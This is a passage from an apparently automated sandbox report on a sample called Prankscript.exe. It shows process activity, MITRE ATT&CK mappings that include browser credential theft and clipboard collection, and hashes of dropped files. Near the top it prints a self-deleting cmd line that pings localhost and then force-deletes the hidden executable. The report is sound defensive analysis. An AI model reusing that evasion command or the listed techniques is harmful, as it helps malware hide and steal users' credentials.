      Suspicious behavior: EnumeratesProcesses
      PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4176
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5160

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x518 0x508
1⤵
PID:3984

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:436

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3180

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38a8855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
232KB

MD5
6fcbc9d99553af671240cedbab34eb37

SHA1
5943dc3b0f7973986b6c4b0c29181ca59c28f04f

SHA256
d496c5d3fea7d1c80ea62964f46dffe3918f15d150631ea81a9c23a08259bd0b

SHA512
d61459f4f5ab5f29eed0f890ae7f596f2cd4cf182b214c4ec49ca969cc6fcd6e748482611226d4555b7255020d0995d66c3b1b4b977c0f254ddb839f22b4ec09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
32KB

MD5
46cf69ad8c8e749e2673fd20f7271b8f

SHA1
5f0257b03bcb166623262f30f236502656620be3

SHA256
e118aa34b0133af39f5e249f19d8fa1d838f4fae7fc5fb8fc6757aa097f2093a

SHA512
2e5b27213f2b865363fa6fe7725affa913d04b19b58bd7b864a5a55da3de893f65aa00c33a5b3f43e97b60bbecc17db683ad82445b75d47d2d9fa8ee7dcbfe86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
32KB

MD5
716080e0e2dcab95a6fe4646e29a9bdb

SHA1
76d6685845827619c163c23fe1dff8b966c1fa1e

SHA256
d5a053832133f1c82c2131b633071d1ab5f7f38d447cbf14a05e610142a60aef

SHA512
e2ff1a7dc782979ca01e09c10f4a9a61547dbd6bb5a56c477c36f0e898ffcd292d4ba85ae10777796aca52adf7ee86ba73d8f096c32fdfe92143c9a1c89fda9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
24KB

MD5
3d7cbe979922f1485f9d929112500081

SHA1
4a4ed7e070c9d2e4b7a9a8b24b6daff69d1e57b5

SHA256
138a9021f136b2a19745bc17d49bfd2b110129ba8482c9175b0061012b5f117e

SHA512
78c1ab744d49ff4bd65bf05e18d7893c42a1ba3016cc23f74f090ad390488ab58a79a036297eb739fccc1dbf4fbced6c485bc699d8d5732f8ea2caaedaaf243b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

Filesize
23KB

MD5
e5ed9755a568010e35497d3d9c6dd4ce

SHA1
5d582fec6a1ed1a4f97642b09e79ea05c472c899

SHA256
99cec5be2d804815d2e73222b0a9e3b4ab1a751f07d83e4f3fb4fb769a627a54

SHA512
20e0bfe19dbda435da99572d4b16242bac813b71608ee551ad516b1867c5103b1945d923d35c5c483844a2263b96a1f5b70bdf4db4a4847583a2aed0ce0f02b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
672B

MD5
7e28f09636ca0d62bfbd67de659918ec

SHA1
47d05bd736c7155ea7872ebea21b542f6de780ad

SHA256
c17bd0bc4ffcfe77e00de296b3828570eda80c6b0afe20aa1c3703e03e62b39c

SHA512
985efab0c56aa631db6227e9ce3d17c6f26ed137b3fd7f584f639d6dd94afa0a89309388cadfe2a16dc7e034dceefb445530f37df3b0bcd9ebca4b269f719e57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
cb2f72c274d6f382861cf4ea136d0a45

SHA1
b2a0f6871d736864b44ab04f48be5b16ffb2212d

SHA256
ff5450104e04449dc3e7ad39be7b01c60657806e1e43a20b10edc50128c15876

SHA512
0204b9c9392b407a609f90f55ae357740d3b99955246810e676b60a4ecfa51922bf5696060e1dc71b90bd11a6df4d37e38df2ac69243bebecc894c0a5be1691a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
30b6dfc4c8ea8caf15568918cb25ed69

SHA1
d6a8e22c55f1abb6b32ff674dd59daaa0ac85feb

SHA256
031130e98f648a6cb6ffd01f15ea7e9e351560cba43e696d4a4d8f02b07a3e6c

SHA512
b7b10d7fe14e798bdefc2c512db59f3f7648a9ec8792e123a9de2268d723b83449a5ffe1f377a93e58f1affebbec3c461032e66abec5036afc94b958a6c582e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d173c1df7c92dad837db2ebcb33697ee

SHA1
3b287603023e8d1c808026d9d3632371ab45b106

SHA256
9774710ebf4bd2a577174f34b43701f57a8645a3f301d84e696f087fddb53edf

SHA512
554f0a1748bfaba54767c6f7b73a4a19e5c2af5c8f219ed25fa9874d723bc784890305f97f3f321fcb596a066acf202f348de385e7a64b6ced2fec821e960987

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
74a9e1ba37a0c0a884deca3878b12421

SHA1
3570bba1c53d7010eb4bb2adde1d2cb238c36a42

SHA256
bca0f03671a21bde1a6cc567d4064ccb072c87c38402d9c86a963e8dd8676a81

SHA512
bed672893af6e2df5cdefa86f15d00c93db8ea40a87b049970a558c9ff89319636f666a556515efe779177bc9d6e4c903ce18d805805a1b5f8a4bc48e7b864e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
89d19307696239c9db38beb2fffc906e

SHA1
b82990d82e68c65285bf45ff37d15196c6c8be9e

SHA256
75449a70cac2f02be02d1604bd57d0d7ab8ffcb7e7660b6c5fca5a5689455997

SHA512
0d2c1bf7535aea8cfea0502f75462dc927fa92c79e6c567184f2621c9301587a15968fc03fd9733a719204893763f92a9ef5c592e4755cd9f478d764133ee029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bae39bdec86b769a076505f19e828635

SHA1
1df68cc30657b427c4a28a28900439de88260160

SHA256
c3ad6ea037dbeab740f7c1785934dae9de3fad81817909b798221999aeba4f2a

SHA512
38f8992197f5e372d29cae04d7bad966063d7d56b0debf4601232f2e2ea0a2aba338ed67e6c2a95a6be4b7af916d8f6d32d1be2744d9efbf25943d792a90f298

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d041ed084a290bf5dde6c2f91435a287

SHA1
6020b56436965392c8f275b08562eee876a40556

SHA256
55bc7275e58475c08de89ccfd1c388af91f8b4de9945c1355db85654b53844a9

SHA512
c5a54ef02b4cfca9ed87f5b69c2348e5b22506d40343b085dd5ec8a135c15979e9c37c7a44754a8f6cb34baa3b1ba66ef216f9cf851b928814a5e91aa1e0a1d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
4cbbafbdc7e9e47b071bcadb4606056e

SHA1
67e6365889ae2f91259ab5df1eed2971d9dade10

SHA256
280bbfec50a4805391758c975c212b7c76c36c4a81324b3dd0e97d1e50d93ae2

SHA512
0426c152faa09a73488c2a7fc1e5c30f5c5a931bf7149bbe0ac55366796dcf7074c014b12e8b8a23f03589977ab7f7171009359ee42a03fd492c4db87785f0c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\75b573a6-ef73-4a11-bb36-b4c81c257880\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\95e43511-b088-4958-a2fb-045631330986\index-dir\the-real-index

Filesize
2KB

MD5
8fac7baeaa04b12a6ec1f7e27516aab0

SHA1
dac1f593cc085ba36a6a1aa1d4f3d2de08f59067

SHA256
dbefb8317fab79ff1d67d5036436ae62fa487ba900f18b81e36eabef72dd894b

SHA512
d7e8a82a000e8c8c2c4d107a1d969dd327fd209007f98e615da25b577f5a1ab7560d10debc032c5ffb20bf87919863e973aae6aec214b51838f27457240164dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\95e43511-b088-4958-a2fb-045631330986\index-dir\the-real-index

Filesize
2KB

MD5
700247f64c99be11ced370dc8b517fc8

SHA1
e59b5a376a60b983de310a00fdddf8fedbce318e

SHA256
f4ddf720f881b44a27d29db8464c7a43717412c8c4df4c44db79d57f4c87e315

SHA512
62f911461dc952123b665df631563b821b85039d3ae28d90b904d7627f2beb4bc7585d3a2a295b2fec4ea5d5a884453d8b764d7e3ee85aca6f5bec39799416b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\95e43511-b088-4958-a2fb-045631330986\index-dir\the-real-index~RFe586f11.TMP

Filesize
48B

MD5
f6a656b2b39b7b686253085123e46fde

SHA1
81c2523fe6e56d4fcbc779f89ce3ba2057026a95

SHA256
68388f7e388fa95e9e9d27bd6d6e99aa8f481ef0a0c075a26c2daef639be3907

SHA512
9ce2af8658bced688efc44fdb4f99d2ee87c0fda49e38e6196b5ad4943a36072ee7db00d3fd93e9a8d1975059114542d594d6de83d5b39696de825cefd658989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bf17c4f0-2fd3-4b31-8010-71c389b64591\index-dir\the-real-index

Filesize
624B

MD5
2ae99c4abbf8c73ca3181e8478b0ee35

SHA1
7c488f5e93cf95ec41e7df20c0934a13103110cb

SHA256
440751988c1558d53a0d2b7b102f2fdd7d33b81a71ed7e82db4e4db9b5475910

SHA512
d5a792ba09203e3e2dc3c37458b6d4c071fd72eccbec4f34b76e816962151862bdfb5d9e4cad70855ffba5dbefda110c74d0f35c54f383111d35136625c7a53a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bf17c4f0-2fd3-4b31-8010-71c389b64591\index-dir\the-real-index~RFe58d6b4.TMP

Filesize
48B

MD5
9bb636fc9eb957daf753dce4ec8707a6

SHA1
ebc8b727d4cefc17bdea3a7b85bb483d26be62f8

SHA256
94eb6badc33e5ba5a18b90881a0806fec492e6c58f95d13f7145cc1c83e98b21

SHA512
187efd33cf6a3d8ca92df09fc34355618f5e9fcb972c4bb8742ddc552557b9bf5010b7dbf2166bc905c621acfc793d746eb2938913ece38b5807b79dd2a65e39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
ce53abfd5918e5c533727896996c6a80

SHA1
32985898683ca3ac9718992c8d4a4f07a9256d0b

SHA256
f1f62cd2395a1d4170dc58fd7c0f5224f8f3f0f8aaeb1ccdfab4aefec30ea8cc

SHA512
967c5ea607a8561ea3a032f0a0338341b251815f3fc03e5d712b34c24d95dfb5f8890f4971ffa6cf9d542e6a30f50b765eaaf890406795ada51522399877c47c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
148B

MD5
ad4260446d3a27b96873f1eaae25ae30

SHA1
50a2b38947f9ed4858bc345f3523141551995c98

SHA256
1e341d0d5382b0d4193985bc889725fda83f41daf37560761b04269718aa3e98

SHA512
956a2cee7ea1020dfa2835d1e5abef8ca240d9b767a5e84bfb6262f27892e739365df34d90445bb0488701928c5863d4c7b1c3019854df80515ad03b49377854

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
234a1e56791af6a64d09087732d1d802

SHA1
2b669c54e392b45d762e9daee2f535ed31c735d6

SHA256
578309eaad21e58b30e8c3fc526fbb6dc00df85c57448575ff80d3196047e5a0

SHA512
3c1eae5450ca7fb3fb307312f6f0e9722099c5f1fe2f802987758923a975ae10f14bc3eb1be944d1bd779129c20e40f2805156f787e767c9d9b2d6d42e4e630f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
7ec0ad167195cace33a161514f0adb87

SHA1
804aadb5fbad1d3b4d11dea45b608a53951b4975

SHA256
4abc9caf86482e8f45a2a9045e45492cf1687b1fc46f4db7d13d2cda8a69364e

SHA512
5a70ed67a63a00e7741b5e248c5ae52d14b2114b1f00f67ac4d393408e4825db531bc47420aeb32bee21eb6608b13a39aa0a304b86ad738de875abf14d5121c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
84B

MD5
e0e64d8b093e2f947c51d7b6f93735bb

SHA1
fc52508618995a602a3a14c863df5000d72fb377

SHA256
d4fda514c6f5c7941781e9405d260b8ef8a6b62a82ffb8ee2f2f5b371bb9da3a

SHA512
efab2346df2a8fd004aa0e5d5f72f9feceb1a0b624f100864dc4d596068dfb3358fdf6961bfd0ccdd5616da84d7738e5f24fec58ece0e75e0cb7977363b0f27a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
153B

MD5
4a052f01b944e9fd8143480a7ac3ff4d

SHA1
25a1c9e10c0c5c575ef69c21280b72e670114d09

SHA256
d056cf9c3aade4697c447d9b3d83acdab134f493c951939eab47da92d8f05f69

SHA512
964cbdfb1a059724d4b4e76dabe7c1cde952d6dc06a3401027e32776ddf142622188d75cd187d69ab4412a9b914f43303158f79b1b628380d4fc33a399c0a296

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
157B

MD5
9312e537db9fa782c0a3c3880b29c774

SHA1
d3236f01a9eacc206009da513c82d9039483a7a3

SHA256
97b4d8ae26642c437703aac0e4848b0f421b288baaf9c62df017ac068be90f7f

SHA512
9429a6c11d69831a6a8586b3b0ccac1f0bf0d2e738c4c85130ab81bda3ad2a91fa0f25f5a92ca918e379e0c29adf2d1eb2f74d4eac98a82c95d8500f31c7b76b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
f4d6c9f1319cde4e9b33d4c9202e29d0

SHA1
905abdd9052763098623b9ac2b325ee1d69410d8

SHA256
d91c55b313e4d8f7350d5b2efed2186d71cbdb34d1c3a9b47429473f01c00ada

SHA512
2df2bee78a4879f862b9505264594ba1ecf8a649aed5e572861515970f2a8ebcf1e6946c4827a469b97cda76b726027b19e2670fab4a1c7b894425c7de9af424

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58c85c.TMP

Filesize
48B

MD5
7e4ec9e5f090944650728ca0d57d6109

SHA1
575866aa6b3dce39bc347e73984e5574502f1f52

SHA256
93ad1ea7e4314e269aade4c74ffdd4a83ad49a2f2cb9888b2037fdc40eb8de1b

SHA512
009a9439dd06676c061a8824708cd9a7c0ef66fc6d5425604d68cbdf4f7c7e5cd2a7feda804938fa99b6bba6c90ff46d10dcebf0e1e9bcf6d50eae40f6dd0743

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
704B

MD5
4c6ea0411ca0cc090cd7db21df4cdfa6

SHA1
25631911e66b98d82cb15200fea94ab274504d74

SHA256
2b8c409ce902626770bd6e8637e926d6005542e7d86855a939b38b4106bc3b80

SHA512
0a32f94ca9cd4dd94255183185aafc20041734d713f6891e414804dad73ff8e3b0a901a4e8b63cbf6529de0374e0a00a5480dcd86cc6361b03c43c348c8a7f18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589cc8.TMP

Filesize
706B

MD5
33184645f491351381dbf77805733fd4

SHA1
2f1cf03d9edcd6a823d28c6d829665d9c80cd6e2

SHA256
37d4dd17f3f83ab56057c2f612f6814000933eacab1a204905133949c3c2f2e6

SHA512
e8f1d78106e1d37576f123b90119893040e3f7592782cafe2f938929dfc2e9df20bd71ad65497d8d06a2fafd322bc6cd2f80414fc1c9dec0b314e28e68e0aa4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
83a14b095fcbcbc0ad20aaefbc172738

SHA1
92ddea86bf22b50e3fa9eefe319dbf7b9658ba6c

SHA256
94a4133199b323651c722060e6b3fbf4cf4440b383cf2b020aa6ff8ef650a87c

SHA512
faa1b4732402b763de977381818e68e44050992148fc462708f8785c960c18616e88f7f015076ff0c054c43278d3031b7299ad7cda276e90013b46e76eb02ba4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
0d04800bff9151141851bd0c6ee74ba6

SHA1
2cafbe338dffa1056fb54fe8520a4c9e1e4cbb42

SHA256
aba33f6bedf2169a9b3c78e0e4ead994f3fff7b926f8f6eb0d41ef29611d474d

SHA512
dda3e40dc2a44f5a91756385be6802307ca63884efa6b6231cb5165c44a683bbcf5f5aa0c491f8b52e1cbdb91e28b3d7f13008648fe4b8ddd166bf0e8d7e374c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
e672c481470bf0039525970073b95d7b

SHA1
da700c17d11a492e8974321808f34abc99ef9dfb

SHA256
8b73af390d873543b65f970b5b8cc0dad6b5410438ca3809667ce0797c05d2d4

SHA512
1f6346d5ad3c5ff3d00fc19b677a8b8c347041162be08f23e63715cbd571951891020d7086636e33276bc9c86d3a2141f290466b9e5c0de7ade0bef127705ac3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e67b7a4d382c8b1625787f0bcae42150

SHA1
cc929958276bc5efa47535055329972f119327c6

SHA256
053d0b08f22ff5121cb832d514195145a55b9a4ca26d1decd446e11b64bef89c

SHA512
3bf0311fe0c57fb9a1976fbeae6d37015736c32c59832252f3bc4c055b2a14c6bcc975dcd63b480d4f520672687a62d5ccd709a6ebdb4566bb83fb081b3f4452

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\BEFB.tmp\BEFC.vbs

Filesize
6KB

MD5
d6f26d50b44406c1bba065a9b1ec2ad7

SHA1
67f754b4139958b2314464bdb2e2faf1c8501c55

SHA256
02def6f01e490ba7366e39db6fbd79f657e347d248db2e0254bc508abc89de75

SHA512
aa0ea658e75531a8ae02befe37dfe172b6c3cb7b4b0bbe77b51cceeb39c2a19a360f23772acf5c89447365f6de1060de0ee7dbda049758d2eff4f84bc8ff02c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC6DA.tmp

Filesize
1KB

MD5
6548ebf2dfc759d810d5b71fff2ba21f

SHA1
ea8c471fd322ea06aff19a2eb6da60fbc1e6a578

SHA256
f509c66e10d5ac7c0bf7c46f1e0e73f828ea0886e7e01d8fa344db6644cde0e1

SHA512
1dd5631190e9d9d372096d95f941a3587c5651b9bbbc4ce053b27778ad16e7b33e58829359cae554d7400ba426c99e0ea9aab8295a5c698b3a7bec7f84577174

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\_bz2.pyd

Filesize
48KB

MD5
5cd942486b252213763679f99c920260

SHA1
abd370aa56b0991e4bfee065c5f34b041d494c68

SHA256
88087fef2cff82a3d2d2d28a75663618271803017ea8a6fcb046a23e6cbb6ac8

SHA512
6cd703e93ebccb0fd896d3c06ca50f8cc2e782b6cc6a7bdd12786fcfb174c2933d39ab7d8e674119faeca5903a0bfac40beffb4e3f6ca1204aaffefe1f30642c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\_ctypes.pyd

Filesize
59KB

MD5
4878ad72e9fbf87a1b476999ee06341e

SHA1
9e25424d9f0681398326252f2ae0be55f17e3540

SHA256
d699e09727eefe5643e0fdf4be4600a1d021af25d8a02906ebf98c2104d3735d

SHA512
6d465ae4a222456181441d974a5bb74d8534a39d20dca6c55825ebb0aa678e2ea0d6a6853bfa0888a7fd6be36f70181f367a0d584fccaa8daa940859578ab2b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\_decimal.pyd

Filesize
107KB

MD5
d60e08c4bf3be928473139fa6dcb3354

SHA1
e819b15b95c932d30dafd7aa4e48c2eea5eb5fcb

SHA256
e21b0a031d399ffb7d71c00a840255d436887cb761af918f5501c10142987b7b

SHA512
6cac905f58c1f25cb91ea0a307cc740575bf64557f3cd57f10ad7251865ddb88965b2ad0777089b77fc27c6d9eb9a1f87456ddf57b7d2d717664c07af49e7b58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\_hashlib.pyd

Filesize
35KB

MD5
edfb41ad93bc40757a0f0e8fdf1d0d6c

SHA1
155f574eef1c89fd038b544778970a30c8ab25ad

SHA256
09a0be93d58ce30fa7fb8503e9d0f83b10d985f821ce8a9659fd0bbc5156d81e

SHA512
3ba7d225828b37a141ed2232e892dad389147ca4941a1a85057f04c0ed6c0eab47b427bd749c565863f2d6f3a11f3eb34b6ee93506dee92ec56d7854e3392b10

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\_lzma.pyd

Filesize
86KB

MD5
25b96925b6b4ea5dd01f843ecf224c26

SHA1
69ba7c4c73c45124123a07018fa62f6f86948e81

SHA256
2fbc631716ffd1fd8fd3c951a1bd9ba00cc11834e856621e682799ba2ab430fd

SHA512
97c56ce5040fb7d5785a4245ffe08817b02926da77c79e7e665a4cfa750afdcb7d93a88104831944b1fe3262c0014970ca50a332b51030eb602bb7fb29b56ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34802\_queue.pyd

Filesize
26KB

MD5
c2ba2b78e35b0ab037b5f969549e26ac

SHA1
cb222117dda9d9b711834459e52c75d1b86cbb6e

SHA256
d8b60222732bdcedddbf026f96bddda028c54f6ae6b71f169a4d0c35bc911846

SHA512
